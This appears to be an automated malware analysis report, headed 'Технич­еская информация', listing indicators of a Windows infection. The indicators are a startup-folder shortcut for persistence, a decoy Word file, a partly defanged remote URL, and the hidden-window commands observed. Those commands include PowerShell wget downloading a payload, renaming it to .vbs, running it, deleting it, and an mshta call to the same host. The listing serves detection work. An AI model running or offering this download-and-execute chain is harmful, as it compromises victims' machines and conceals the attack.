Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\helppane.lnk
- %TEMP%\gshword.docx
- http://19#.#19.111.4/xx/dv
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $tmp = New-TemporaryFile;wget -v "http://19#.#19.111.4/xx/dv.zip" -outfile $tmp.FullName;$tmp.FullName | Rename-Item -NewName { $_ -replace 'tmp$', 'vbs' }' (со скрытым окном)
- '%WINDIR%\syswow64\timeout.exe' /T 10 /nobreak' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' invoke-item "$env:temp\*.vbs' (со скрытым окном)
- '%WINDIR%\syswow64\timeout.exe' /T 20 /nobreak' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Remove-Item "$env:temp\*.vbs' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://19#.#19.111.4/xx/dv
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\GSHword.docx"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $tmp = New-TemporaryFile;wget -v "http://19#.#19.111.4/xx/dv.zip" -outfile $tmp.FullName;$tmp.FullName | Rename-Item -NewName { $_ -replace 'tmp$', 'vbs' }
- '%WINDIR%\syswow64\timeout.exe' /T 10 /nobreak
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' invoke-item "$env:temp\*.vbs
- '%WINDIR%\syswow64\timeout.exe' /T 20 /nobreak
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Remove-Item "$env:temp\*.vbs